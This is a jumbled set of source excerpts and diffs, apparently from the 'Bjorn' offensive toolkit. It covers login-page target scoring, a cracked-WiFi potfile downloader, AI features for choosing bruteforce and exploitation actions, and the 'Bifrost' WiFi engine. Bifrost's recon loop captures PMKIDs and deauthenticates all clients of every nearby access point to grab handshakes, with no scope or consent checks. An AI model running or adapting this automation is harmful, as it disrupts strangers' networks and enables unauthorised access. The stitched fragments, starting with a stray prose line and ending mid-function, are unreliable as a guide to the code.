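A rate-limited login form scores 35 − 25 = 10, which is exactly the intended effect: defensive controls push the target down the recon priority list.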
class WebSurfaceMapper:
def __init__(self, shared_data):
self.shared_data = shared_data
def _db_upsert_summary(
self,
*,
mac: str,
ip: str,
hostname: str,
port: int,
scheme: str,
summary: dict,
):
directory = "/__surface_summary__"
payload = json.dumps(summary, ensure_ascii=True)
self.shared_data.db.execute(
"""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, method,
user_agent, headers, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, 'surface_mapper', 'SUMMARY', '', ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
headers = COALESCE(excluded.headers, webenum.headers),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""",
(
mac or "",
ip or "",
hostname or "",
int(port),
directory,
200,
len(payload),
0,
"application/json",
payload,
),
)
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
hostname = (row.get("Hostname") or row.get("hostname") or "").strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
try:
port_i = int(port) if str(port).strip() else 80
except Exception:
port_i = 80
scheme = _scheme_for_port(port_i)
self.shared_data.bjorn_orch_status = "WebSurfaceMapper"
self.shared_data.bjorn_status_text2 = f"{ip}:{port_i}"
self.shared_data.comment_params = {"ip": ip, "port": str(port_i), "phase": "score"}
# Load recent profiler rows for this target.
rows: List[Dict[str, Any]] = []
try:
rows = self.shared_data.db.query(
"""
SELECT directory, status, content_type, headers, response_time, last_seen
FROM webenum
WHERE mac_address=? AND ip=? AND port=? AND is_active=1 AND tool='login_profiler'
ORDER BY last_seen DESC
""",
(mac or "", ip, int(port_i)),
)
except Exception as e:
logger.error(f"DB query failed (webenum login_profiler): {e}")
rows = []
progress = ProgressTracker(self.shared_data, max(1, len(rows)))
scored: List[Tuple[int, str, int, str, dict]] = []
try:
for r in rows:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
directory = str(r.get("directory") or "/")
status = int(r.get("status") or 0)
ctype = str(r.get("content_type") or "")
h = _safe_json_loads(str(r.get("headers") or ""))
signals = h.get("signals") if isinstance(h, dict) else {}
score = _score_signals(signals if isinstance(signals, dict) else {})
scored.append((score, directory, status, ctype, signals if isinstance(signals, dict) else {}))
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"path": directory,
"score": str(score),
}
progress.advance(1)
scored.sort(key=lambda t: (t[0], t[2]), reverse=True)
top = scored[:5]
avg = int(sum(s for s, *_ in scored) / max(1, len(scored))) if scored else 0
top_path = top[0][1] if top else ""
top_score = top[0][0] if top else 0
summary = {
"ip": ip,
"port": int(port_i),
"scheme": scheme,
"count_profiled": int(len(rows)),
"avg_score": int(avg),
"top": [
{"score": int(s), "path": p, "status": int(st), "content_type": ct, "signals": sig}
for (s, p, st, ct, sig) in top
],
"ts_epoch": int(time.time()),
}
try:
self._db_upsert_summary(
mac=mac,
ip=ip,
hostname=hostname,
port=port_i,
scheme=scheme,
summary=summary,
)
except Exception as e:
logger.error(f"DB upsert summary failed: {e}")
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"count": str(len(rows)),
"top_path": top_path,
"top_score": str(top_score),
"avg_score": str(avg),
}
progress.set_complete()
return "success"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""


@@ -8,6 +8,7 @@ import argparse
import requests
import subprocess
from datetime import datetime
import logging
# ── METADATA / UI FOR NEO LAUNCHER ────────────────────────────────────────────
@@ -172,8 +173,9 @@ class WPAsecPotfileManager:
response = requests.get(self.DOWNLOAD_URL, cookies=cookies, stream=True)
response.raise_for_status()
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
filename = os.path.join(save_dir, f"potfile_{timestamp}.pot")
ts = datetime.now().strftime("%Y%m%d_%H%M%S")
filename = os.path.join(save_dir, f"potfile_{ts}.pot")
os.makedirs(save_dir, exist_ok=True)
with open(filename, "wb") as file:

File diff suppressed because it is too large.

ai_engine.py (new file, 1121 lines)

File diff suppressed because it is too large.

ai_utils.py (new file, 99 lines)

@@ -0,0 +1,99 @@
"""
ai_utils.py - Shared AI utilities for Bjorn
"""
import json
import numpy as np
from typing import Dict, List, Any, Optional
def extract_neural_features_dict(host_features: Dict[str, Any], network_features: Dict[str, Any], temporal_features: Dict[str, Any], action_features: Dict[str, Any]) -> Dict[str, float]:
"""
Extracts all available features as a named dictionary.
This allows the model to select exactly what it needs by name.
"""
f = {}
# 1. Host numericals
f['host_port_count'] = float(host_features.get('port_count', 0))
f['host_service_count'] = float(host_features.get('service_count', 0))
f['host_ip_count'] = float(host_features.get('ip_count', 0))
f['host_credential_count'] = float(host_features.get('credential_count', 0))
f['host_age_hours'] = float(host_features.get('age_hours', 0))
# 2. Host Booleans
f['has_ssh'] = 1.0 if host_features.get('has_ssh') else 0.0
f['has_http'] = 1.0 if host_features.get('has_http') else 0.0
f['has_https'] = 1.0 if host_features.get('has_https') else 0.0
f['has_smb'] = 1.0 if host_features.get('has_smb') else 0.0
f['has_rdp'] = 1.0 if host_features.get('has_rdp') else 0.0
f['has_database'] = 1.0 if host_features.get('has_database') else 0.0
f['has_credentials'] = 1.0 if host_features.get('has_credentials') else 0.0
f['is_new'] = 1.0 if host_features.get('is_new') else 0.0
f['is_private'] = 1.0 if host_features.get('is_private') else 0.0
f['has_multiple_ips'] = 1.0 if host_features.get('has_multiple_ips') else 0.0
# 3. Vendor Category (One-Hot)
vendor_cats = ['networking', 'iot', 'nas', 'compute', 'virtualization', 'mobile', 'other', 'unknown']
current_vendor = host_features.get('vendor_category', 'unknown')
for cat in vendor_cats:
f[f'vendor_is_{cat}'] = 1.0 if cat == current_vendor else 0.0
# 4. Port Profile (One-Hot)
port_profiles = ['camera', 'web_server', 'nas', 'database', 'linux_server',
'windows_server', 'printer', 'router', 'generic', 'unknown']
current_profile = host_features.get('port_profile', 'unknown')
for prof in port_profiles:
f[f'profile_is_{prof}'] = 1.0 if prof == current_profile else 0.0
# 5. Network Stats
f['net_total_hosts'] = float(network_features.get('total_hosts', 0))
f['net_subnet_count'] = float(network_features.get('subnet_count', 0))
f['net_similar_vendor_count'] = float(network_features.get('similar_vendor_count', 0))
f['net_similar_port_profile_count'] = float(network_features.get('similar_port_profile_count', 0))
f['net_active_host_ratio'] = float(network_features.get('active_host_ratio', 0.0))
# 6. Temporal features
f['time_hour'] = float(temporal_features.get('hour_of_day', 0))
f['time_day'] = float(temporal_features.get('day_of_week', 0))
f['is_weekend'] = 1.0 if temporal_features.get('is_weekend') else 0.0
f['is_night'] = 1.0 if temporal_features.get('is_night') else 0.0
f['hist_action_count'] = float(temporal_features.get('previous_action_count', 0))
f['hist_seconds_since_last'] = float(temporal_features.get('seconds_since_last', 0))
f['hist_success_rate'] = float(temporal_features.get('historical_success_rate', 0.0))
f['hist_same_attempts'] = float(temporal_features.get('same_action_attempts', 0))
f['is_retry'] = 1.0 if temporal_features.get('is_retry') else 0.0
f['global_success_rate'] = float(temporal_features.get('global_success_rate', 0.0))
f['hours_since_discovery'] = float(temporal_features.get('hours_since_discovery', 0))
# 7. Action Info
action_types = ['bruteforce', 'enumeration', 'exploitation', 'extraction', 'other']
current_type = action_features.get('action_type', 'other')
for atype in action_types:
f[f'action_is_{atype}'] = 1.0 if atype == current_type else 0.0
f['action_target_port'] = float(action_features.get('target_port', 0))
f['action_is_standard_port'] = 1.0 if action_features.get('is_standard_port') else 0.0
return f
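The one-hot blocks above (vendor, port profile, action type) all follow the same pattern; a minimal standalone sketch of that encoding (hypothetical category names) looks like:

```python
def one_hot(prefix, categories, current):
    """Encode `current` as a 1.0/0.0 flag per known category."""
    return {f'{prefix}_is_{c}': 1.0 if c == current else 0.0 for c in categories}

features = one_hot('profile', ['camera', 'router', 'unknown'], 'router')
```

A value outside the known categories encodes as all zeros, which is how the extractor above degrades for unexpected inputs.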
def extract_neural_features(host_features: Dict[str, Any], network_features: Dict[str, Any], temporal_features: Dict[str, Any], action_features: Dict[str, Any]) -> List[float]:
"""
Deprecated: Hardcoded list. Use extract_neural_features_dict for evolution.
Kept for backward compatibility during transition.
"""
d = extract_neural_features_dict(host_features, network_features, temporal_features, action_features)
# Return as a list in a fixed order (the one previously used)
# This is fragile and will be replaced by manifest-based extraction.
return list(d.values())
def get_system_mac() -> str:
"""
Get the persistent MAC address of the device.
Used for unique identification in Swarm mode.
"""
try:
import uuid
mac = uuid.getnode()
return ':'.join(('%012X' % mac)[i:i+2] for i in range(0, 12, 2))
    except Exception:
return "00:00:00:00:00:00"

bifrost/__init__.py Normal file
@@ -0,0 +1,585 @@
"""
Bifrost — Pwnagotchi-compatible WiFi recon engine for Bjorn.
Runs as a daemon thread alongside MANUAL/AUTO/AI modes.
"""
import os
import time
import subprocess
import threading
import logging
from logger import Logger
logger = Logger(name="bifrost", level=logging.DEBUG)
class BifrostEngine:
"""Main Bifrost lifecycle manager.
Manages the bettercap subprocess and BifrostAgent daemon loop.
Pattern follows SentinelEngine (sentinel.py).
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self._thread = None
self._stop_event = threading.Event()
self._running = False
self._bettercap_proc = None
self._monitor_torn_down = False
self._monitor_failed = False
self.agent = None
@property
def enabled(self):
return bool(self.shared_data.config.get('bifrost_enabled', False))
def start(self):
"""Start the Bifrost engine (bettercap + agent loop)."""
if self._running:
logger.warning("Bifrost already running")
return
# Wait for any previous thread to finish before re-starting
if self._thread and self._thread.is_alive():
logger.warning("Previous Bifrost thread still running — waiting ...")
self._stop_event.set()
self._thread.join(timeout=15)
logger.info("Starting Bifrost engine ...")
self._stop_event.clear()
self._running = True
self._monitor_failed = False
self._monitor_torn_down = False
self._thread = threading.Thread(
target=self._loop, daemon=True, name="BifrostEngine"
)
self._thread.start()
def stop(self):
"""Stop the Bifrost engine gracefully.
Signals the daemon loop to exit, then waits for it to finish.
The loop's finally block handles bettercap shutdown and monitor teardown.
"""
if not self._running:
return
logger.info("Stopping Bifrost engine ...")
self._stop_event.set()
self._running = False
if self._thread and self._thread.is_alive():
self._thread.join(timeout=15)
self._thread = None
self.agent = None
# Safety net: teardown is idempotent, so this is a no-op if
# _loop()'s finally already ran it.
self._stop_bettercap()
self._teardown_monitor_mode()
logger.info("Bifrost engine stopped")
def _loop(self):
"""Main daemon loop — setup monitor mode, start bettercap, create agent, run recon cycle."""
try:
# Install compatibility shim for pwnagotchi plugins
from bifrost import plugins as bfplugins
from bifrost.compat import install_shim
install_shim(self.shared_data, bfplugins)
# Setup monitor mode on the WiFi interface
self._setup_monitor_mode()
if self._monitor_failed:
logger.error(
"Monitor mode setup failed — Bifrost cannot operate without monitor "
"mode. For Broadcom chips (Pi Zero W/2W), install nexmon: "
"https://github.com/seemoo-lab/nexmon — "
"Or use an external USB WiFi adapter with monitor mode support.")
# Teardown first (restores network services) BEFORE switching mode,
# so the orchestrator doesn't start scanning on a dead network.
self._teardown_monitor_mode()
self._running = False
# Now switch mode back to AUTO — the network should be restored.
# We set the flag directly FIRST (bypass setter to avoid re-stopping),
# then ensure manual_mode/ai_mode are cleared so getter returns AUTO.
try:
self.shared_data.config["bifrost_enabled"] = False
self.shared_data.config["manual_mode"] = False
self.shared_data.config["ai_mode"] = False
self.shared_data.manual_mode = False
self.shared_data.ai_mode = False
self.shared_data.invalidate_config_cache()
logger.info("Bifrost auto-disabled due to monitor mode failure — mode: AUTO")
except Exception:
pass
return
# Start bettercap
self._start_bettercap()
self._stop_event.wait(3) # Give bettercap time to initialize
if self._stop_event.is_set():
return
# Create agent (pass stop_event so its threads exit cleanly)
from bifrost.agent import BifrostAgent
self.agent = BifrostAgent(self.shared_data, stop_event=self._stop_event)
# Load plugins
bfplugins.load(self.shared_data.config)
# Initialize agent
self.agent.start()
logger.info("Bifrost agent started — entering recon cycle")
# Main recon loop (port of do_auto_mode from pwnagotchi)
while not self._stop_event.is_set():
try:
# Full spectrum scan
self.agent.recon()
if self._stop_event.is_set():
break
# Get APs grouped by channel
channels = self.agent.get_access_points_by_channel()
# For each channel
for ch, aps in channels:
if self._stop_event.is_set():
break
self.agent.set_channel(ch)
# For each AP on this channel
for ap in aps:
if self._stop_event.is_set():
break
# Send association frame for PMKID
self.agent.associate(ap)
# Deauth all clients for full handshake
for sta in ap.get('clients', []):
if self._stop_event.is_set():
break
self.agent.deauth(ap, sta)
if not self._stop_event.is_set():
self.agent.next_epoch()
except Exception as e:
if 'wifi.interface not set' in str(e):
logger.error("WiFi interface lost: %s", e)
self._stop_event.wait(60)
if not self._stop_event.is_set():
self.agent.next_epoch()
else:
logger.error("Recon loop error: %s", e)
self._stop_event.wait(5)
except Exception as e:
logger.error("Bifrost engine fatal error: %s", e)
finally:
from bifrost import plugins as bfplugins
bfplugins.shutdown()
self._stop_bettercap()
self._teardown_monitor_mode()
self._running = False
# ── Monitor mode management ─────────────────────────
# ── Nexmon helpers ────────────────────────────────────
@staticmethod
def _has_nexmon():
"""Check if nexmon firmware patches are installed."""
import shutil
if not shutil.which('nexutil'):
return False
# Verify patched firmware via dmesg
try:
r = subprocess.run(
['dmesg'], capture_output=True, text=True, timeout=5)
if 'nexmon' in r.stdout.lower():
return True
except Exception:
pass
# nexutil exists — assume usable even without dmesg confirmation
return True
@staticmethod
def _is_brcmfmac(iface):
"""Check if the interface uses the brcmfmac driver (Broadcom)."""
driver_path = '/sys/class/net/%s/device/driver' % iface
try:
real = os.path.realpath(driver_path)
return 'brcmfmac' in real
except Exception:
return False
def _detect_phy(self, iface):
"""Detect the phy name for a given interface (e.g. 'phy0')."""
try:
r = subprocess.run(
['iw', 'dev', iface, 'info'],
capture_output=True, text=True, timeout=5)
for line in r.stdout.splitlines():
if 'wiphy' in line:
idx = line.strip().split()[-1]
return 'phy%s' % idx
except Exception:
pass
return 'phy0'
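The wiphy lookup parses the text output of `iw dev <iface> info`; a standalone sketch of that parsing against sample output (the sample text is an assumption about the tool's format):

```python
SAMPLE = """Interface wlan0
    ifindex 3
    wdev 0x1
    type managed
    wiphy 0
"""

def parse_phy(iw_info_output, default='phy0'):
    """Extract the phy name from `iw dev <iface> info` text."""
    for line in iw_info_output.splitlines():
        if 'wiphy' in line:
            return 'phy%s' % line.strip().split()[-1]
    return default
```

Falling back to `'phy0'` on empty or unexpected output mirrors the method above.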
def _setup_monitor_mode(self):
"""Put the WiFi interface into monitor mode.
Strategy order:
1. Nexmon — for Broadcom brcmfmac chips (Pi Zero W / Pi Zero 2 W)
Uses: iw phy <phy> interface add mon0 type monitor + nexutil -m2
2. airmon-ng — for chipsets with proper driver support (Atheros, Realtek, etc.)
3. iw — direct fallback for other drivers
"""
self._monitor_torn_down = False
self._nexmon_used = False
cfg = self.shared_data.config
iface = cfg.get('bifrost_iface', 'wlan0mon')
# If configured iface already ends with 'mon', derive the base name
if iface.endswith('mon'):
base_iface = iface[:-3] # e.g. 'wlan0mon' -> 'wlan0'
else:
base_iface = iface
# Store original interface name for teardown
self._base_iface = base_iface
self._mon_iface = iface
# Check if a monitor interface already exists
if iface != base_iface and self._iface_exists(iface):
logger.info("Monitor interface %s already exists", iface)
return
# ── Strategy 1: Nexmon (Broadcom brcmfmac) ────────────────
if self._is_brcmfmac(base_iface):
logger.info("Broadcom brcmfmac chip detected on %s", base_iface)
if self._has_nexmon():
if self._setup_nexmon(base_iface, cfg):
return
# nexmon setup failed — don't try other strategies, they won't work either
self._monitor_failed = True
return
else:
logger.error(
"Broadcom brcmfmac chip requires nexmon firmware patches for "
"monitor mode. Install nexmon manually using install_nexmon.sh "
"or visit: https://github.com/seemoo-lab/nexmon")
self._monitor_failed = True
return
# ── Strategy 2: airmon-ng (Atheros, Realtek, etc.) ────────
airmon_ok = False
try:
logger.info("Killing interfering processes ...")
subprocess.run(
['airmon-ng', 'check', 'kill'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
timeout=15,
)
logger.info("Starting monitor mode: airmon-ng start %s", base_iface)
result = subprocess.run(
['airmon-ng', 'start', base_iface],
capture_output=True, text=True, timeout=30,
)
combined = (result.stdout + result.stderr).strip()
logger.info("airmon-ng output: %s", combined)
if 'Operation not supported' in combined or 'command failed' in combined:
logger.warning("airmon-ng failed: %s", combined)
else:
# airmon-ng may rename the interface (wlan0 -> wlan0mon)
if self._iface_exists(iface):
logger.info("Monitor mode active: %s", iface)
airmon_ok = True
elif self._iface_exists(base_iface):
logger.info("Interface %s is now in monitor mode (no rename)", base_iface)
cfg['bifrost_iface'] = base_iface
self._mon_iface = base_iface
airmon_ok = True
if airmon_ok:
return
except FileNotFoundError:
logger.warning("airmon-ng not found, trying iw fallback ...")
except Exception as e:
logger.warning("airmon-ng failed: %s, trying iw fallback ...", e)
# ── Strategy 3: iw (direct fallback) ──────────────────────
try:
subprocess.run(
['ip', 'link', 'set', base_iface, 'down'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
result = subprocess.run(
['iw', 'dev', base_iface, 'set', 'type', 'monitor'],
capture_output=True, text=True, timeout=10,
)
if result.returncode != 0:
err = result.stderr.strip()
logger.error("iw set monitor failed (rc=%d): %s", result.returncode, err)
self._monitor_failed = True
subprocess.run(
['ip', 'link', 'set', base_iface, 'up'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
return
subprocess.run(
['ip', 'link', 'set', base_iface, 'up'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
logger.info("Monitor mode set via iw on %s", base_iface)
cfg['bifrost_iface'] = base_iface
self._mon_iface = base_iface
except Exception as e:
logger.error("Failed to set monitor mode: %s", e)
self._monitor_failed = True
def _setup_nexmon(self, base_iface, cfg):
"""Enable monitor mode using nexmon (for Broadcom brcmfmac chips).
Creates a separate monitor interface (mon0) so wlan0 can potentially
remain usable for management traffic (like pwnagotchi does).
Returns True on success, False on failure.
"""
mon_iface = 'mon0'
phy = self._detect_phy(base_iface)
logger.info("Nexmon: setting up monitor mode on %s (phy=%s)", base_iface, phy)
try:
# Kill interfering services (same as pwnagotchi)
for svc in ('wpa_supplicant', 'NetworkManager', 'dhcpcd'):
subprocess.run(
['systemctl', 'stop', svc],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
# Remove old mon0 if it exists
if self._iface_exists(mon_iface):
subprocess.run(
['iw', 'dev', mon_iface, 'del'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=5,
)
# Create monitor interface via iw phy
result = subprocess.run(
['iw', 'phy', phy, 'interface', 'add', mon_iface, 'type', 'monitor'],
capture_output=True, text=True, timeout=10,
)
if result.returncode != 0:
logger.error("Failed to create %s: %s", mon_iface, result.stderr.strip())
return False
# Bring monitor interface up
subprocess.run(
['ifconfig', mon_iface, 'up'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
# Enable monitor mode with radiotap headers via nexutil
result = subprocess.run(
['nexutil', '-m2'],
capture_output=True, text=True, timeout=10,
)
if result.returncode != 0:
logger.warning("nexutil -m2 returned rc=%d: %s", result.returncode, result.stderr.strip())
# Verify
verify = subprocess.run(
['nexutil', '-m'],
capture_output=True, text=True, timeout=5,
)
mode_val = verify.stdout.strip()
logger.info("nexutil -m reports: %s", mode_val)
if not self._iface_exists(mon_iface):
logger.error("Monitor interface %s not created", mon_iface)
return False
# Success — update config to use mon0
cfg['bifrost_iface'] = mon_iface
self._mon_iface = mon_iface
self._nexmon_used = True
logger.info("Nexmon monitor mode active on %s (phy=%s)", mon_iface, phy)
return True
except FileNotFoundError as e:
logger.error("Required tool not found: %s", e)
return False
except Exception as e:
logger.error("Nexmon setup error: %s", e)
return False
def _teardown_monitor_mode(self):
"""Restore the WiFi interface to managed mode (idempotent)."""
if self._monitor_torn_down:
return
base_iface = getattr(self, '_base_iface', None)
mon_iface = getattr(self, '_mon_iface', None)
if not base_iface:
return
self._monitor_torn_down = True
logger.info("Restoring managed mode for %s ...", base_iface)
if getattr(self, '_nexmon_used', False):
# ── Nexmon teardown ──
try:
subprocess.run(
['nexutil', '-m0'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=5,
)
logger.info("Nexmon monitor mode disabled (nexutil -m0)")
except Exception:
pass
# Remove the mon0 interface
if mon_iface and mon_iface != base_iface and self._iface_exists(mon_iface):
try:
subprocess.run(
['iw', 'dev', mon_iface, 'del'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=5,
)
logger.info("Removed monitor interface %s", mon_iface)
except Exception:
pass
else:
# ── airmon-ng / iw teardown ──
try:
iface_to_stop = mon_iface or base_iface
subprocess.run(
['airmon-ng', 'stop', iface_to_stop],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
timeout=15,
)
logger.info("Monitor mode stopped via airmon-ng")
except FileNotFoundError:
try:
subprocess.run(
['ip', 'link', 'set', base_iface, 'down'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
subprocess.run(
['iw', 'dev', base_iface, 'set', 'type', 'managed'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
subprocess.run(
['ip', 'link', 'set', base_iface, 'up'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
logger.info("Managed mode restored via iw on %s", base_iface)
except Exception as e:
logger.error("Failed to restore managed mode: %s", e)
except Exception as e:
logger.warning("airmon-ng stop failed: %s", e)
# Restart network services that were killed
restarted = False
for svc in ('wpa_supplicant', 'dhcpcd', 'NetworkManager'):
try:
subprocess.run(
['systemctl', 'start', svc],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=15,
)
restarted = True
except Exception:
pass
# Wait for network services to actually reconnect before handing
# control back so the orchestrator doesn't scan a dead interface.
if restarted:
logger.info("Waiting for network services to reconnect ...")
time.sleep(5)
@staticmethod
def _iface_exists(iface_name):
"""Check if a network interface exists."""
return os.path.isdir('/sys/class/net/%s' % iface_name)
# ── Bettercap subprocess management ────────────────
def _start_bettercap(self):
"""Spawn bettercap subprocess with REST API."""
cfg = self.shared_data.config
iface = cfg.get('bifrost_iface', 'wlan0mon')
host = cfg.get('bifrost_bettercap_host', '127.0.0.1')
port = str(cfg.get('bifrost_bettercap_port', 8081))
user = cfg.get('bifrost_bettercap_user', 'user')
password = cfg.get('bifrost_bettercap_pass', 'pass')
cmd = [
'bettercap', '-iface', iface, '-no-colors',
'-eval', 'set api.rest.address %s' % host,
'-eval', 'set api.rest.port %s' % port,
'-eval', 'set api.rest.username %s' % user,
'-eval', 'set api.rest.password %s' % password,
'-eval', 'api.rest on',
]
logger.info("Starting bettercap: %s", ' '.join(cmd))
try:
self._bettercap_proc = subprocess.Popen(
cmd,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
logger.info("bettercap PID: %d", self._bettercap_proc.pid)
except FileNotFoundError:
logger.error("bettercap not found! Install with: apt install bettercap")
raise
except Exception as e:
logger.error("Failed to start bettercap: %s", e)
raise
def _stop_bettercap(self):
"""Kill the bettercap subprocess."""
if self._bettercap_proc:
try:
self._bettercap_proc.terminate()
self._bettercap_proc.wait(timeout=5)
except subprocess.TimeoutExpired:
self._bettercap_proc.kill()
except Exception:
pass
self._bettercap_proc = None
logger.info("bettercap stopped")
# ── Status for web API ────────────────────────────────
def get_status(self):
"""Return full engine status for web API."""
base = {
'enabled': self.enabled,
'running': self._running,
'monitor_failed': self._monitor_failed,
}
if self.agent and self._running:
base.update(self.agent.get_status())
else:
base.update({
'mood': 'sleeping',
'face': '(-.-) zzZ',
'voice': '',
'channel': 0,
'num_aps': 0,
'num_handshakes': 0,
'uptime': 0,
'epoch': 0,
'mode': 'auto',
'last_pwnd': '',
'reward': 0,
})
return base

bifrost/agent.py Normal file
@@ -0,0 +1,568 @@
"""
Bifrost — WiFi recon agent.
Ported from pwnagotchi/agent.py using composition instead of inheritance.
"""
import time
import json
import os
import re
import asyncio
import threading
import logging
from bifrost.bettercap import BettercapClient
from bifrost.automata import BifrostAutomata
from bifrost.epoch import BifrostEpoch
from bifrost.voice import BifrostVoice
from bifrost import plugins
from logger import Logger
logger = Logger(name="bifrost.agent", level=logging.DEBUG)
class BifrostAgent:
"""WiFi recon agent — drives bettercap, captures handshakes, tracks epochs."""
def __init__(self, shared_data, stop_event=None):
self.shared_data = shared_data
self._config = shared_data.config
self.db = shared_data.db
self._stop_event = stop_event or threading.Event()
# Sub-systems
cfg = self._config
self.bettercap = BettercapClient(
hostname=cfg.get('bifrost_bettercap_host', '127.0.0.1'),
scheme='http',
port=int(cfg.get('bifrost_bettercap_port', 8081)),
username=cfg.get('bifrost_bettercap_user', 'user'),
password=cfg.get('bifrost_bettercap_pass', 'pass'),
)
self.automata = BifrostAutomata(cfg)
self.epoch = BifrostEpoch(cfg)
self.voice = BifrostVoice()
self._started_at = time.time()
self._filter = None
flt = cfg.get('bifrost_filter', '')
if flt:
try:
self._filter = re.compile(flt)
except re.error:
logger.warning("Invalid bifrost_filter regex: %s", flt)
self._current_channel = 0
self._tot_aps = 0
self._aps_on_channel = 0
self._supported_channels = list(range(1, 15))
self._access_points = []
self._last_pwnd = None
self._history = {}
self._handshakes = {}
self.mode = 'auto'
# Whitelist
self._whitelist = [
w.strip().lower() for w in
str(cfg.get('bifrost_whitelist', '')).split(',') if w.strip()
]
# Channels
self._channels = [
int(c.strip()) for c in
str(cfg.get('bifrost_channels', '')).split(',') if c.strip()
]
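Both comma-separated config settings are normalized the same way; a minimal sketch of that parsing (hypothetical input values):

```python
def parse_whitelist(raw):
    """Lowercase, trim, and drop empty entries from a comma-separated string."""
    return [w.strip().lower() for w in str(raw).split(',') if w.strip()]

def parse_channels(raw):
    """Parse a comma-separated channel list into ints."""
    return [int(c.strip()) for c in str(raw).split(',') if c.strip()]
```

An empty config value yields an empty list, which the agent treats as "no restriction".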
# Ensure handshakes dir
hs_dir = cfg.get('bifrost_bettercap_handshakes', '/root/bifrost/handshakes')
if hs_dir and not os.path.exists(hs_dir):
try:
os.makedirs(hs_dir, exist_ok=True)
except OSError:
pass
# ── Lifecycle ─────────────────────────────────────────
def start(self):
"""Initialize bettercap, start monitor mode, begin event polling."""
self._wait_bettercap()
self.setup_events()
self.automata.set_starting()
self._log_activity('system', 'Bifrost starting', self.voice.on_starting())
self.start_monitor_mode()
self.start_event_polling()
self.start_session_fetcher()
self.next_epoch()
self.automata.set_ready()
self._log_activity('system', 'Bifrost ready', self.voice.on_ready())
def setup_events(self):
"""Silence noisy bettercap events."""
logger.info("connecting to %s ...", self.bettercap.url)
silence = [
'ble.device.new', 'ble.device.lost', 'ble.device.disconnected',
'ble.device.connected', 'ble.device.service.discovered',
'ble.device.characteristic.discovered',
'mod.started', 'mod.stopped', 'update.available',
'session.closing', 'session.started',
]
for tag in silence:
try:
self.bettercap.run('events.ignore %s' % tag, verbose_errors=False)
except Exception:
pass
def _reset_wifi_settings(self):
iface = self._config.get('bifrost_iface', 'wlan0mon')
self.bettercap.run('set wifi.interface %s' % iface)
self.bettercap.run('set wifi.ap.ttl %d' % self._config.get('bifrost_personality_ap_ttl', 120))
self.bettercap.run('set wifi.sta.ttl %d' % self._config.get('bifrost_personality_sta_ttl', 300))
self.bettercap.run('set wifi.rssi.min %d' % self._config.get('bifrost_personality_min_rssi', -200))
hs_dir = self._config.get('bifrost_bettercap_handshakes', '/root/bifrost/handshakes')
self.bettercap.run('set wifi.handshakes.file %s' % hs_dir)
self.bettercap.run('set wifi.handshakes.aggregate false')
def start_monitor_mode(self):
"""Wait for monitor interface and start wifi.recon."""
iface = self._config.get('bifrost_iface', 'wlan0mon')
has_mon = False
retries = 0
while not has_mon and retries < 30 and not self._stop_event.is_set():
try:
s = self.bettercap.session()
for i in s.get('interfaces', []):
if i['name'] == iface:
logger.info("found monitor interface: %s", i['name'])
has_mon = True
break
except Exception:
pass
if not has_mon:
logger.info("waiting for monitor interface %s ... (%d)", iface, retries)
self._stop_event.wait(2)
retries += 1
if not has_mon:
logger.warning("monitor interface %s not found after %d retries", iface, retries)
# Detect supported channels
try:
from bifrost.compat import _build_utils_shim
self._supported_channels = _build_utils_shim(self.shared_data).iface_channels(iface)
except Exception:
self._supported_channels = list(range(1, 15))
logger.info("supported channels: %s", self._supported_channels)
self._reset_wifi_settings()
# Start wifi recon
try:
wifi_running = self._is_module_running('wifi')
if wifi_running:
self.bettercap.run('wifi.recon off; wifi.recon on')
self.bettercap.run('wifi.clear')
else:
self.bettercap.run('wifi.recon on')
except Exception as e:
err_msg = str(e)
if 'Operation not supported' in err_msg or 'EOPNOTSUPP' in err_msg:
logger.error(
"wifi.recon failed: %s — Your WiFi chip likely does NOT support "
"monitor mode. The built-in Broadcom chip on Raspberry Pi Zero/Zero 2 "
"has limited monitor mode support. Use an external USB WiFi adapter "
"(e.g. Alfa AWUS036ACH, Panda PAU09) that supports monitor mode and "
"packet injection.", e)
self._log_activity('error',
'WiFi chip does not support monitor mode',
'Use an external USB WiFi adapter with monitor mode support')
else:
logger.error("Error starting wifi.recon: %s", e)
def _wait_bettercap(self):
retries = 0
while retries < 30 and not self._stop_event.is_set():
try:
self.bettercap.session()
return
except Exception:
logger.info("waiting for bettercap API ...")
self._stop_event.wait(2)
retries += 1
if not self._stop_event.is_set():
raise Exception("bettercap API not available after 60s")
def _is_module_running(self, module):
try:
s = self.bettercap.session()
for m in s.get('modules', []):
if m['name'] == module:
return m['running']
